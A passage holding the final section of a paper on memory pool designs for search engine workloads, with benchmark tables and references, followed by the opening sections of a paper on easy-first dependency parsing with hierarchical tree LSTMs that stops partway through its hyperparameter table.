pointer, which point to the currently allocated block, the allocation request are looked for from the current block every time, when the margin is not enough, it create a new block inserted into the list, select allocation strategy through the template parameter of Allocate Policy. The structure of the graph is shown in figure 5. 74 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.5 The Structure of Stagepool 4. Performance test and analysis Through the Centos operating system, the compiler and debugging tools of vim, g++ and scons, Some scenarios are designed to simulate the actual scene of the search engine to test the performance differences between the default memory distributor and the designed distributor. 4.1 Performance test and analysis of the small objects distributor 1) For the small objects allocator test, when the amount of data is 100000, by testing the system function of New/Delete and the memory pool interface function of Allocate/Deallocate. Record 5 groups of data, as shown in Table 1, by analyzing and calculating the time difference, the small objects allocator is increased by 70.20% relative to New of system, and compared with the Delete, it is increased by 2.29%. 2) For the thread adapter hash table test, using the Node Allocator class to match the hash table, construct an identical class of Default Allocator, the internal partition function use New/Delete to achieve, using template parameters to match a hash table. For the single threaded test: For Node Allocator and Default Allocator, to applicate and release 50000 block, assuming that the program is running a fixed time of 10s, during this time repeated inserted and delete operation; Multi-threaded test: For Node Allocator and Default Allocator, to open the same number of threads, and execute thread function, to insert and delete data for corresponding hash tables. Table 2 indicates the test data of hash table. By analyzing and calculating: In the case of Single threaded, in terms of distribution, the efficiency of Node is increased by 22.61%, for the release, the efficiency of Node is reduced by 18.94%; In the case of multiple threads, in terms of distribution, the efficiency of the Node is increased by 13.80%, for the release, the efficiency of Node is reduced by 1.20%. 3) For the test of the small objects allocator adapter map container, to achieve a Small Object Alloator type, internal distribution released is achieved by Small ObjectPool, through the Map function, fit Small ObjectAllocator to Map, Map node distribution and release call interface of Allocate/Deallocate of Small ObjectPool; Similarly to achieve a NewAllocator type, internal distribution release is achieved by Research on Optimization of memory pool management for high concurrent service requests 75 New/Delete interface, also mapping to the Map through the constructed function; To compare with distributor type provided by the system. Single threaded test: Three map were inserted into 100000 data; Multi threaded test: Map data is inserted and emptied by three Map circulation within a certain time. Table 3 indicates the test data of adapter Map. By analyzing and calculating: In the case of Single threaded, in terms of Default, the efficiency is increased by 48.30%, for the New, the efficiency is increased by 54.50%; In the case of multiple threads, in terms of Default, the efficiency is increased by 35.90%, for the New, the efficiency is increased by 33.10%. Table 1 Testing Data of the Small Objects Distributor(µs) Number of times New allocation time New release time Small allocation time Small release time 1 5318 2739 3174 2157 2 4662 1994 1271 1792 3 4856 2317 1350 1919 4 5093 3044 1381 1988 5 4899 1953 1253 1916 6 4768 2344 1329 3160 7 4835 2051 1743 1858 8 5852 2070 1388 1819 9 6412 2783 1328 1892 10 5119 2310 1271 1859 Average time 5181.4 2360.5 1548.8 2036 Table 2 Testing Data of Thread Adapter Hash Table(µs) Number Single thread Single thread Single thread Single thread Multi-threaded Multi-threaded Multi-threaded Multi-threaded of times default default node node ded default ded default ded node ded node allocation release allocation release allocation release allocation release 1 42 39 33 48 141 130 121 131 2 43 39 33 48 143 130 123 131 3 43 40 33 47 147 127 119 125 4 43 40 33 48 147 133 131 134 5 43 39 33 48 141 127 123 131 6 43 40 33 48 140 125 121 128 7 43 40 33 48 143 129 126 131 8 43 39 33 48 140 125 119 125 9 43 40 34 39 141 125 123 129 10 43 40 34 49 141 127 122 129 Average time 42.9 39.6 33.2 47.1 142.4 127.8 122.8 129.4 76 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Table 3 Testing data of Adapter Map Multi Thread(µs) Number of times Single thread Default Single thread Small Single thread New Multi-threaded Default Multi-threaded Small Multi-threaded New 1 18 10 23 340 229 378 2 19 10 21 381 247 375 3 18 10 19 391 261 361 4 17 9 20 404 241 356 5 19 9 19 419 252 383 6 18 9 19 388 251 377 7 16 9 19 367 260 374 8 18 8 19 373 249 401 9 17 8 22 435 257 366 10 16 9 19 396 248 360 Average time 17.6 9.1 20 389.4 249.5 373.1 4.2 Performance test and analysis of recoverable variable length memory pool Given a set of arrays with assigned sizefrom 1-10000, 4 threads, 5000 insert delete action, then use a variable length memory pool to assign and storage an array of pointers, to release and reallocate, cycle 20 times to get the test data results; Using Malloc to open the corresponding bytes of memory and assigning to another pointer array to storage. Under the same conditions, compare the time of distribution and release of the system function. Table 4 is the test data, by analyzing and calculating: In terms of New,the efficiency of RecycleLitePool is increased by 13.84%. Table 4 Testing Data of Recoverable Variable Length Distributor(ms) Number of times New RecycleLitePool 1 183 177 2 185 157 3 181 154 4 197 164 5 177 153 6 183 154 7 183 156 8 182 154 9 183 159 10 181 153 Average time 183.5 158.1 Research on Optimization of memory pool management for high concurrent service requests 77 4.3 Performance test and analysis of allocate not free memory pool Building a new distributor structure, alloc is interface of the distributor, using the space of distributor to allocate 4 bytes every time, allocated 10000 times; As a contrast, the system call the New function to allocate 4 bytes each time, to record the time of 50000 application action. Table 5 is the test data, by analyzing and calculating: In terms of New, the efficiency of StagepPool is increased by 90.80%. Table 5 Testing Data of Allocate Not Free Distributor(ΜS) Number of times StagePool Newl 1 4 51 2 5 47 3 4 48 4 4 48 5 5 48 6 5 48 7 4 48 8 4 47 9 5 47 10 4 47 Average time 4.4 47.9 5. Conclusion 1)Three scenarios are obtained by analyzing the current search engines: Hash table insert delete, Cache update and document update module, Query result return. Three memory pools are designed for the three scenarios: Recoverable Fixed Length Memory Pool and Recoverable Variable Length Memory Pool and Allocate Not Free Memory Pool were designed. 2)Using thesystem default memory management function, malloc/free and new/delete. By analyzing of the various factors of the function. Allocating and freeing memory on the heap increases overhead. The design of the memory pool is applied to the search engine system. It optimize the internal memory management and improve the search speed. For the test of the three memory pool, Compared with the system’s default memory, its efficiency are increased by 70.20%, 13.84%, 90.80%. Sponsors or Supporters This paper is partially supported by Special research project of Shaanxi Provincial Department of Education “16JK1376”. Reference [1] DAI Chunyan, XU Zhiwen. Discussion About Malloc/Free and New/Delete in C++[J].Science&Technology 78 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 of Baotou Steel (Group)Corporation, 2009(35):59 [2] LI Qian, PAN Minxue, LI Xuandong. Benchmark of Tools for Memory Leak [J]. Journal of Frontiers of Computer Science and Technology.2010(01)29. [3] WANG Xiaoyin, CHEN Lijun. Implementation and Application of the Memory Pool in Linux Kernel [J]. Journal of Xi’an University of Posts and Telecommunications. 2011(04):40. [4] QU Weihua, WANG Qun. Introduce and Analyzing of Search Engine Principle [J]. Computer Knowledgeand Technology. 2006(06):113. [5] DUAN Bingying. Study and Design of Web Crawler in Search Engine [D]. Xidian University. 2014. [6] GUO Bingxuan, ZHANG Jingli, ZHANG Zhichao. Algorithm of Spatial Data Scheduling Based on Memory Pool [J]. Computer Engineering. 2008,34(06):63. [7] LIU Tao, NIE Xiaofeng, JING Jiwu, WANG Yuewu. Memory Management in Worm Simulation based on Small Object Memory Allocation Technique on The GTNetS [J]. Journal of Graduate University of Chinese Academy of Sciences. 2012,29(01):131. [8] GUO Xufeng, YU Fang,LIU Zhongli. An Efficient Memory Built-in Self-Repair Method Based on Hash Table [J]. Acta Electronica Sinica. 2013(07):1371. [9] LAI Xiangfang. Select The Appropriate STL Containers [J]. Digital Technology and Application. 2015(09):177. [10] Alexandrescu A.Modern C ++ design: Generic Programming and Design Patterns Applied [M]. Boston: Addison-Wesley Professional. 2001. [11] Robert W.P.Luka, Wai Lamb. Efficient In-Memory Extensible Inverted File [J]. Information Systems, 2007(32):733. AuthorBrief Liu Ping-Ping(1971-), female, Associate Professor, Xi’an Technological University, Research area: Artificial intelligence work_5u2zpk2fhfbwneryxw4r65giga ---- Easy-First Dependency Parsing with Hierarchical Tree LSTMs Eliyahu Kiperwasser Computer Science Department Bar-Ilan University Ramat-Gan, Israel elikip@gmail.com Yoav Goldberg Computer Science Department Bar-Ilan University Ramat-Gan, Israel yoav.goldberg@gmail.com Abstract We suggest a compositional vector represen- tation of parse trees that relies on a recursive combination of recurrent-neural network en- coders. To demonstrate its effectiveness, we use the representation as the backbone of a greedy, bottom-up dependency parser, achiev- ing very strong accuracies for English and Chinese, without relying on external word embeddings. The parser’s implementation is available for download at the first author’s webpage. 1 Introduction Dependency-based syntactic representations of sen- tences are central to many language processing tasks (Kübler et al., 2009). Dependency parse-trees en- code not only the syntactic structure of a sentence but also many aspects of its semantics. A recent trend in NLP is concerned with encod- ing sentences as vectors (“sentence embeddings”), which can then be used for further prediction tasks. Recurrent neural networks (RNNs) (Elman, 1990), and in particular methods based on the LSTM archi- tecture (Hochreiter and Schmidhuber, 1997), work very well for modeling sequences, and constantly obtain state-of-the-art results on both language- modeling and prediction tasks (see, e.g. (Mikolov et al., 2010)). Several works attempt to extend recurrent neu- ral networks to work on trees (see Section 8 for a brief overview), giving rise to the so-called recursive neural networks (Goller and Kuchler, 1996; Socher et al., 2010). However, recursive neural networks do not cope well with trees with arbitrary branch- ing factors – most work require the encoded trees to be binary-branching, or have a fixed maximum arity. Other attempts allow arbitrary branching factors, at the expense of ignoring the order of the modifiers. In contrast, we propose a tree-encoding that nat- urally supports trees with arbitrary branching fac- tors, making it particularly appealing for depen- dency trees. Our tree encoder uses recurrent neural networks as a building block: we model the left and right sequences of modifiers using RNNs, which are composed in a recursive manner to form a tree (Sec- tion 3). We use our tree representation for encoding the partially-built parse trees in a greedy, bottom-up dependency parser which is based on the easy-first transition-system of Goldberg and Elhadad (2010). Using the Hierarchical Tree LSTM representa- tion, and without using any external embeddings, our parser achieves parsing accuracies of 92.6 UAS and 90.2 LAS on the PTB (Stanford dependencies) and 86.1 UAS and 84.4 LAS on the Chinese tree- bank, while relying on greedy decoding. To the best of our knowledge, this is the first work to demonstrate competitive parsing accuracies for full-scale parsing while relying solely on recursive, compositional tree representations, and without us- ing a reranking framework. We discuss related work in Section 8. While the parsing experiments demonstrate the suitability of our representation for capturing the structural elements in the parse tree that are useful for predicting parsing decisions, we are interested in exploring the use of the RNN-based compositional vector representation of parse trees also for seman- 445 Transactions of the Association for Computational Linguistics, vol. 4, pp. 445–461, 2016. Action Editor: Noah Smith. Submission batch: 11/2015; Revision batch: 2/2016; Published 8/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. tic tasks such as sentiment analysis (Socher et al., 2013b; Tai et al., 2015), sentence similarity judge- ments (Marelli et al., 2014) and textual entailment (Bowman et al., 2015). 2 Background and Notation 2.1 Dependency-based Representation A dependency-based syntactic representation is cen- tered around syntactic modification relations be- tween head words and modifier words. The result are trees in which each node is a word in the sen- tence, and every node except for one designated root node has a parent node. A dependency tree over a sentence with n words w1, . . . ,wn can be repre- sented as a list of n pairs of the form (h,m), where 0 ≤ h ≤ n and 1 ≤ m ≤ n. Each such pair rep- resents an edge in the tree in which h is the index of a head word (including the special ROOT node 0), and m is the index of a modifier word. In or- der for the dependency trees to be useful for actual downstream language processing tasks, each edge is labeled with a syntactic relation. The tree represen- tation then becomes a list of triplets (h,m,`), where 1 ≤ ` ≤ L is the index of a dependency relation out of a designated set of L syntactic relations. Dependency trees tend to be relatively shallow, with some nodes having many children. Looking at trees in the PTB training set we find that 94% of the trees have a height of at most 10, and 49% of the trees a height of at most 6. In terms of width, 93% of the trees have at least one node with an arity of 4 or more, and 56% of the trees have at least one node with an arity of 6 or more. 2.2 Recurrent Networks and LSTMs Recurrent neural networks (RNNs), first proposed by Elman (1990) are statistical learners for model- ing sequential data. In this work, we use the RNN abstraction as a building block, and recursively com- bine several RNNs to obtain our tree representa- tion. We briefly describe the RNN abstraction be- low. For further detail on RNNs, the reader is re- ferred to sources such as (Goldberg, 2015; Bengio and Courville, 2016; Cho, 2015). The RNN abstraction is a function RNN that takes in a sequence of inputs vectors x1, . . . ,xn (xi ∈ Rdin ), and produces a sequence of state vec- tors (also called output vectors) y1, . . . ,yn (yi ∈ Rdout ). Each yi is conditioned on all the inputs x1, . . . ,xi preceding it. Ignoring the intermediate outputs y1, . . . ,yn−1, the RNN can be thought of as encoding the sequence x1, . . . ,xn into a final state yn. Our notation in this paper follows this view. The RNN is defined recursively using two func- tions:1 RNN(s0,x1, . . . ,xn) = yn = O(sn) si = N(si−1,xi) Here, a function N takes as input a vector xi and a state vector si−1 and returns as output a new state si. One can then extract an output vector yi from si using the function O (the function O is usually the identity function, or a function that returns a subset of the elements in si). Taking an algorithmic perspective, one can view the RNN as a state object with three operations: s = RNN.initial() returns a new initial state, s.advance(x) takes an input vector and returns a new state, and s.output() returns the output vector for the current state. When clear from the context, we abbreviate and use the state’s name (s) instead of s.output() to refer to the output vec- tor at the state. The functions N and O defining the RNN are pa- rameterized by parameters θ (matrices and vectors), which are trained from data. Specifically, one is usu- ally interested in using some of the outputs yi for making predictions. The RNN is trained such that the encoding yi is good for the prediction task. That is, the RNN learns which aspects of the sequence x1, . . . ,xi are informative for the prediction. We use subscripts (i.e. RNNL, RNNR) to indi- cate different RNNs, that is, RNNs that have differ- ent sets of parameters. Specific instantiations of N and O yield differ- ent recurrent network mechanisms. In this work we use the Long Short Term Memory (LSTM) variant (Hochreiter and Schmidhuber, 1997) which is shown to be a very capable sequence learner. However, our algorithm and encoding method do not rely on any specific property of the LSTM architecture, and the 1We follow the notation of Goldberg (2015), with the excep- tion of taking the output of the RNN to be a single vector rather than a sequence, and renaming R to N. 446 LSTM can be transparently switched for any other RNN variant. 3 Tree Representation We now describe our method for representing a tree as a d-dimensional vector. We assume trees in which the children are ordered and there are kl ≥ 0 children before the parent node (left children) and kr ≥ 0 children after it (right children). Such trees correspond well to dependency tree structures. We refer to the parent node as a head, and to its children as modifiers. For a node t, we refer to its left modifiers as t.l1, t.l2, . . . , t.lkl and its right modifiers as t.r1, t.r2, . . . , t.rkr The indices of the modifier are always from the parent outward, that is t.l1 is the left modifier closest to the head t: t t.r1 t.r2 t.r3 t.r4t.l1t.l2t.l3 The gist of the idea is to treat the modifiers of a node as a sequence, and encode this sequence us- ing an RNN. We separate left-modifiers from right- modifiers, and use two RNNs: the first RNN en- codes the sequence of left-modifiers from the head outwards, and the second RNN the sequence of right-modifiers from the head outwards. The first input to each RNN is the vector representation of the head word, and the last input is the vector rep- resentation of the left-most or the right-most modi- fier. The node’s representation is then a concatena- tion of the RNN encoding of the left-modifiers with the RNN encoding of the right-modifiers. The en- coding is recursive: the representation for each of the modifier nodes is computed in a similar fashion. t R L t.r1 R t.r2 R t.r3 R t.r4 R t t.l1 L t.l2 L t.l3 L enc(t) RNNR RNNL concatenate and compress More formally, consider a node t. Let i(t) be the sentence index of the word corresponding to the head node t, and let vi be a vector corresponding to the ith word in the sentence (this vector captures information such as the word form and its part of speech tag, and will be discussed shortly). The vec- tor encoding of a node enc(t) ∈ Rdenc is then de- fined as follows: enc(t) =g(We · (el(t)◦er(t)) + be) el(t) =RNNL(vi(t),enc(t.l1), . . . ,enc(t.lkl)) er(t) =RNNR(vi(t),enc(t.r1), . . . ,enc(t.rkr)) First, the sequences consisting of the head-vector vi(t) followed by left-modifiers and the head-vector followed by right-modifiers are encoded using two RNNs, RNNL and RNNR, resulting in RNN states el(t) ∈ Rdout and er(t) ∈ Rdout . Then, the RNN states are concatenated, resulting in a 2dout- dimensional vector (el(t)◦er(t)), which is reduced back to d-dimensions using a linear transformation followed by a non-linear activation function g. The recursion stops at leaf nodes, for which: enc(leaf) =g(We · (el(leaf)◦er(leaf)) + be) el(leaf) =RNNL(vi(leaf)) er(leaf) =RNNR(vi(leaf)) Figure 1 shows the network used for encoding the sentence “the black fox who really likes apples did not jump over a lazy dog yesterday”. 3.1 Representing words In the discussion above we assume a vector repre- sentation vi associated with the ith sentence word. What does vi look like? A sensible approach would be to take vi to be a function of the word-form and the part-of-speech (POS) tag of the ith word, that is: vi = g(W v · (wi ◦pi) + bv) where wi and pi are the embedded vectors of the word-form and POS-tag of the ith word. This encodes each word in isolation, disregarding its context. The context of a word can be very in- formative regarding its meaning. One way of incor- porating context is the Bidirectional RNN (Schuster and Paliwal, 1997). Bidirectional RNNs are shown to be an effective representation for sequence tag- ging (Irsoy and Cardie, 2014). Bidirectional RNNs represent a word in the sentence using a concate- nation of the end-states of two RNNs, one running 447 the black fox who really likes apples did not jump over a lazy dog yesterday L R L R L R L R L R L R L R L R L R L L L L LRL R RL R R L R L L R RL R R L R R L L the black reallyfoxL foxR whoL whoR likesL likesR jumpL jumpR overL overR dogL dogR the black fox who really likes apples who really likes apples really likes apples over a lazy dog apples a lazy dog did not a lazy yesterday the black fox who really likes apples did not jump over a lazy dog yesterday Figure 1: Network for encoding the sentence “the black fox who really likes apples did not jump over a lazy dog yesterday”. Top: the network structure: boxed nodes represent LSTM cells, where L are cells belonging to the left- modifiers sequence model RNNL, and R to the right-modifiers sequence model RNNR. Circle nodes represent a concatenation followed by a linear transformation and a non-linearity. Bottom: the dependency parse of the sentence. from the beginning of the sentence to the word and the other running from the end to the word. The re- sult is a vector representation for each word which captures not only the word but also its context. We adopt the Bidirectional LSTM scheme to en- rich our node vector representation, and for an n- words sentence compute the vector representations vi as follows: v′i =g(W v · (wi ◦pi) + bv) fi =LSTMF (v ′ 1,v ′ 2, . . . ,v ′ i) bi =LSTMB(v ′ n,v ′ n−1, . . . ,v ′ i) vi =(fi ◦ bi) We plug this word representation as word vectors, allowing each word vector vi to capture informa- tion regarding the word form and POS-tag, as well as the sentential context it appears in. The BI- LSTM encoder is trained jointly with the rest of the network towards the parsing objective, using back- propagation. Embedding vectors The word and POS embed- dings wi and pi are also trained together with the network. For the word embeddings, we experiment with random initialization, as well as with initializa- tion using pre-trained word embeddings. Our main goal in this work is not to provide top parsing accu- racies, but rather to evaluate the ability of the pro- posed compositional architecture to learn and cap- ture the structural cues that are needed for accurate parsing. Thus, we are most interested in the random initialization setup: what can the network learn from the training corpus alone, without relying on exter- nal resources. However, the ability to perform semi-supervised learning by initializing the word-embeddings with vectors that are pre-trained on large amount of unan- notated data is an appealing property of the neural- network approaches, and we evaluate our parser also in this semi-supervised setup. When using pre- trained word embeddings, we follow (Dyer et al., 2015) and use embedding vectors which are trained using positional context (Ling et al., 2015), as these 448 were shown to work better than traditional skip- gram vectors for syntactic tasks such as part-of- speech tagging and parsing. 3.2 A note on the head-outward generation Why did we choose to encode the children from the head outward, and not the other way around? The head outward generation order is needed to facili- tate incremental tree construction and allow for ef- ficient parsing, as we show in section 4 below. Be- sides the efficiency considerations, using the head- outward encoding puts more emphasis on the outer- most dependants, which are known to be the most in- formative for predicting parse structure.2 We rely on the RNN capability of extracting information from arbitrary positions in the sequence to incorporate in- formation about the head word itself, which appears in the beginning of the sequence. This seems to work well, which is expected considering that the average maximal number of siblings in one direction in the PTB is 4.1, and LSTMs were demonstrated to capture much longer-range interactions. Still, when using the tree encoding in a situation where the tree is fully specified in advance, i.e. for sentence classi- fication, sentence similarity or translation tasks, us- ing a head-inward generation order (or even a bi- directional RNN) may prove to work better. We leave this line of inquiry to future work. The head-outward modifier generation approach has a long history in the parsing literature, and goes back to at least Eisner (1996) and Collins (1997). In contrast to previous work in which each modi- fier could condition only on a fixed small number of modifiers preceding it, and in which the left- and right- sequences of modifiers were treated as inde- pendent from one another for computational effi- ciency reasons, our approach allows the model to access information from the entirety of both the left and the right sequences jointly. 2Features in transition-based dependency parsers often look at the current left-most and right-most dependents of a given node, and almost never look further than the second left-most or second right-most dependents. Second-order graph based dependency parsers (McDonald, 2006; Eisner, 2000) also con- dition on the current outermost dependent when generating its sibling. 4 Parsing Algorithm We now turn to explain how to parse using the tree encoder defined above. We begin by describing our bottom-up parsing algorithm, and then show how the encoded vector representation can be built and main- tained throughout the parsing process. 4.1 Bottom-up Parsing We follow a (projective) bottom-up parsing strategy, similar to the easy-first parsing algorithm of Gold- berg and Elhadad (2010). The main data-structure in the parser is a list of partially-built parse trees we call pending. For a sentence with words w1, . . . ,wn, the pending list is initialized with n nodes, where pending[i] corre- sponds to word wi. The algorithm then chooses two neighbouring trees in the pending list pending[i] and pending[i + 1] and either attaches the root of pending[i+1] as the right-most modifier of the root of pending[i], or attaches the root of pending[i] as the left-most modifier of the root of pending[i + 1]. The tree which was treated as modifier is then re- moved from the pending list, shortening it by one. The process ends after n−1 steps, when a single tree remains in the pending list, which is taken to be the output parse tree. The parsing process is described in Algorithm 1. Algorithm 1 Parsing 1: Input: Sentence w = w1, . . . ,wn 2: for i ∈ 1, . . . ,n do 3: pend[i].id ← i 4: arcs ← [] 5: while |pend| > 1 do 6: A ←{(i,d) | 1 ≤ i < |pend|,d ∈{l,r}} 7: i,d ← select(A) 8: if d = l then 9: m,h ← pend[i], pend[i + 1] 10: pend.remove(i) 11: else 12: h,m ← pend[i], pend[i + 1] 13: pend.remove(i + 1) 14: arcs.append(h.id,m.id) 15: return arcs This parsing algorithm is both sound and com- plete with respect to the class of projective depen- 449 dency trees (Goldberg and Elhadad, 2010). The al- gorithm depends on non-deterministic choices of an index in the pending list and an attachment direc- tion (line 7). When parsing in practice, the non- deterministic choice will be replaced by using a trained classifier to assign a score to each index- direction pair, and selecting the highest scoring pair. We discuss the scoring function in Section 4.4, and the training algorithm in Section 5. 4.2 Bottom-up Tree-Encoding We would like the scoring function to condition on the vector encodings of the subtrees it aims to con- nect. Algorithm 2 shows how to maintain the vec- tor encodings together with the parsing algorithm, so that at every stage in the parsing process each item pending[i] is associated with a vector encoding of the corresponding tree. Algorithm 2 Parsing while maintaining tree repre- sentations 1: Input: Sentence w = w1, . . . ,wn 2: Input: Vectors vi corresponding to words wi 3: arcs ← [] 4: for i ∈ 1, . . . ,n do 5: pend[i].id ← i 6: pend[i].el ← RNNL.init().append(vi) 7: pend[i].er ← RNNR.init().append(vi) 8: while |pend| > 1 do 9: A ←{(i,d) | 1 ≤ i < |pend|,d ∈{l,r}} 10: i,d ← select(A) 11: if d = l then 12: m,h ← pend[i], pend[i + 1] 13: m.c = m.el ◦m.er 14: m.enc = g(W(m.c) + b) 15: h.el.append(m.enc) 16: pend.remove(i) 17: else 18: h,m ← pend[i], pend[i + 1] 19: m.c = m.el ◦m.er 20: m.enc = g(W(m.c) + b) 21: h.er.append(m.enc) 22: pend.remove(i + 1) 23: arcs.add(h.id,m.id) 24: return arcs 4.3 Labeled Tree Representation The tree representation described above does not ac- count for the relation labels ` the parsing algorithm assigns each edge. In cases the tree is fully specified in advance, the relation of each word to its head can be added to the word representations vi. However, in the context of parsing, the labels become known only when the modifier is attached to its parent. We thus extend the tree representation by concatenating the node vector representation with a vector repre- sentation assigned to the label connecting the sub- tree to its parent. Formally, only the final enc(t) equation changes: enc(t) = g(We · (el ◦er ◦ `) + be) where ` is a learned embedding vector associated with the given label. 4.4 Scoring Function The parsing algorithm relies on a function select(A) for choosing the action to take at each stage. We model this function as: select(A) = argmax(i,d,`)∈AScore(pend,i,d,`) where Score(.) is a learned function whose job is to assign scores to possible actions to reflect their quality. Ideally, it will not only score correct ac- tions above incorrect ones, but also more confident (easier) actions above less confident ones, in order to minimize error propagation in the greedy parsing process. When scoring a possible attachment between a head h and a modifier m with relation `, the scor- ing function should attempt to reflect the following pieces of information: • Are the head words of h and m compatible un- der relation l? • Is the modifier m compatible with the already existing modifiers of h? In other words, is m a good subtree to connect as an outer-most mod- ifier in the subtree h? • Is m complete, in the sense that it already ac- quired all of its own modifiers? to this end, the scoring function looks at a window of k subtrees to each side of the head-modifier pair (pend[i−k], . . . ,pend[i + 1 + k]) where the neigh- bouring subtrees are used for providing hints regard- ing possible additional modifiers of m and h that are 450 yet to be acquired. We use k = 2 in our experi- ments, for a total of 6 subtrees in total. This win- dow approach is also used in the Easy-First parser of Goldberg and Elhadad (Goldberg and Elhadad, 2010) and works that extend it (Tratz and Hovy, 2011; Ma et al., 2012; Ma et al., 2013). How- ever, unlike the previous work, which made use of extensive feature engineering and rich feature func- tions aiming at extracting the many relevant linguis- tic sub-structures from the 6 subtrees and their inter- actions, we provide the scoring function solely with the vector-encoding of the 6 subtrees in the window. Modeling the labeled attachment score is more difficult than modeling the unlabeled score and is prone to more errors. Moreover, picking the label for an attachment will cause less cascading error in contrast to picking the wrong attachment, which will necessarily preclude the parser from reaching the correct tree structure. In order to partially overcome this issue, our scoring function is a sum of two auxil- iary scoring function, one scoring unlabeled and the other scoring labeled attachments. The unlabeled at- tachment score term in the sum functions as a fall- back which makes it easier for a parser to predict the attachment direction even when there is no sufficient certainty as to the label. Score(pend,i,d,`) = ScoreU(pend,i,d) + ScoreL(pend,i,d,`) Each of ScoreU and ScoreL are modeled as multi- layer perceptrons: ScoreU(pend,i,d) = MLPU(xi)[d] ScoreL(pend,i,d,`) = MLPL(xi)[(d,`)] xi = pend[i−2].c◦ · · · ◦pend[i + 3].c where MLPU and MLPL are standard multi- layer perceptron classifiers with one hidden layer (MLPX(x) = W2g(W1x+b1)+b2) and have out- put layers with size 2 and 2L respectively, [.] is an indexing operation, and we assume the values of d and (d,`) are mapped to integer values. 4.5 Computational Complexity The Easy-First parsing algorithm works in O(n log n) time (Goldberg and Elhadad, 2010). The parser in this works differ by three aspects: running a BI-LSTM encoder prior to parsing (O(n)); maintaining the tree representation during parsing (lines 11–22 in Algorithm 2) which take a constant time at each parsing step; and local scoring using an MLP rather than a linear classifier (again, a constant-time operation). Thus, the parser maintains the O(n log n) complexity of the Easy-First parser. 5 Training Algorithm 5.1 Loss and Parameter Updates At each step of the parsing process we select the highest scoring action (i,d,`). The goal of training is to set the Score function such that correct actions are scored above incorrect ones. We use a margin- based objective, aiming to maximize the margin be- tween the highest scoring correct action and the set of incorrect actions. Formally, we define a hinge loss for each parsing step as follows: max{0,1−max(i,d,`)∈GScore(pend,i,d,`) +max(i′,d′,`′)∈A\GScore(pend,i,d,`)} where A is the set of all possible actions and G is the set of correct actions at the current stage. As the scoring function depends on vector- encodings of all trees in the window, and each tree- encoding depends on the network’s parameters, each parameter update will invalidate all the vector en- codings, requiring a re-computation of the entire network. We thus sum the local losses through- out the parsing process, and update the parameter with respect to the sum of the losses at sentence boundaries. Since we are using hinge loss the gradi- ents will become sparser as the training progresses. Fewer non-zero gradients could translate to unreli- able updates. In order to increase gradient stability and training speed, we use a variation of mini-batch in which we update the parameters only after 50 er- rors were made. This assures us a sufficient number of gradients for every update thus minimizing the effect of gradient instability. The gradients of the entire network with respect to the sum of the losses are calculated using the backpropagation algorithm. Initial experiments with an SGD optimizer showed very instable results. We settled instead on using the ADAM optimizer (Kingma and Ba, 2015) which 451 worked well without requiring fiddling with learning rates. 5.2 Error-Exploration and Dynamic Oracle Training At each stage in the training process, the parser as- signs scores to all the possible actions (i,d,`) ∈ A. It then selects an action, applies it, and moves to the next step. Which action should be chosen? A sensi- ble option is to define G as the set of actions that can lead to the gold tree, and following the highest scor- ing actions in this set. However, using training in this manner tends to suffer from error propagation at test time. The parser sees only states that result from following correct actions. The lack of examples con- taining errors in the training phase makes it hard for the parser to infer the best action given partly erro- neous trees. In order to cope with this, we follow the error exploration training strategy, in which we let the parser follow the highest scoring action in A during training even if this action is incorrect, expos- ing it to states that result from erroneous decisions. This strategy requires defining the set G such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. Such a set G is called a dynamic oracle. Error-exploration and dynamic-oracles were introduced by Goldberg and Nivre (2012). The Dynamic Oracle A dynamic-oracle for the easy-first parsing system we use is presented in (Goldberg and Nivre, 2013). Briefly, the dynamic- oracle version of G defines the set of gold actions as the set of actions which does not increase the num- ber of erroneous attachments more than the mini- mum possible (given previous erroneous actions). The number of erroneous attachments is increased in three cases: (1) connecting a modifier to its head prematurely. Once the modifier is attached it is re- moved from the pending list and therefore can no longer acquire any of its own modifiers; (2) connect- ing a modifier to an erroneous head, when the cor- rect head is still on the pending list; (3) connecting a modifier to a correct head, but an incorrect label. Dealing with cases (2) and (3) is trivial. To deal with (1), we consider as correct only actions in which the modifier is complete. To efficiently iden- tify complete modifiers we hold a counter for each word which is initialized to the number of modifiers the word has in the gold tree. When applying an attachment the counter of the modifier’s gold head word is decreased. When the counter reaches 0, the sub-tree rooted at that word has no pending modi- fiers, and is considered complete. Aggressive Exploration We found that even when using error-exploration, after one iteration the model remembers the training set quite well, and does not make enough errors to make error-exploration effec- tive. In order to expose the parser to more errors, we employ a cost augmentation scheme: we some- times follow incorrect actions also if they score be- low correct actions. Specifically, when the score of the correct action is greater than that of the wrong action but the difference is smaller than the margin constant, we chose to follow the wrong action with probability paug (we use paug = 0.1 in our experi- ments). Pseudocode for the entire training algorithm is given in the supplementary material. 5.3 Out-of-vocabulary items and word-dropout Due to the sparsity of natural language, we are likely to encounter at test time a substantial number of the words that did not appear in the training data (OOV words). OOV words are likely even when pre-training the word representations on a large un- annotated corpora. A common approach is to desig- nate a special “unknown-word” symbol, whose as- sociated vector will be used as the word representa- tion whenever an OOV word is encountered at test time. In order to train the unknown-word vector, a possible approach is to replace all the words appear- ing in the training corpus less than a certain num- ber of times with the unknown-word symbol. This approach gives a good vector representation for un- known words but at the expense of ignoring many of the words from the training corpus. We instead propose a variant of the word-dropout approach (Iyyer et al., 2015). During training, we replace a word with the unknown-word symbol with probability that is inversely proportional to fre- quency of the word. Formally, we replace a word w appearing #(w) times in the training corpus with the unknown symbol with a probability: punk(w) = α #(w) + α 452 Using this approach we learn a vector representa- tion for unknown words with minimal impact on the training of sparse words. 6 Implementation Details Our Python implementation will be made available at the first author’s website. We use the PyCNN wrapper of the CNN library3 for building the com- putation graph of the network, computing the gradi- ents using automatic differentiation, and performing parameter updates. We noticed the error on the de- velopment set does not improve after 20 iterations over the training set, therefore, we ran the train- ing for 20 iterations. The sentences where shuffled between iterations. Non-projective sentences were skipped during training. We use the default parame- ters initialization, step sizes and regularization val- ues provided by the PyCNN toolkit. The hyper- parameters of the final networks used for all the re- ported experiments are detailed in Table 1. Word embedding dimension 100 POS tag embedding dimension 25 Relation embedding dimension 25 Hidden units in ScoreU 100 Hidden units in ScoreL 100 LSTM Dimensions (tree) 200 LSTM Layers (tree) 2 BI-LSTM Dimensions 100+100 BI-LSTM Layers 2 Mini-batch size 50 α 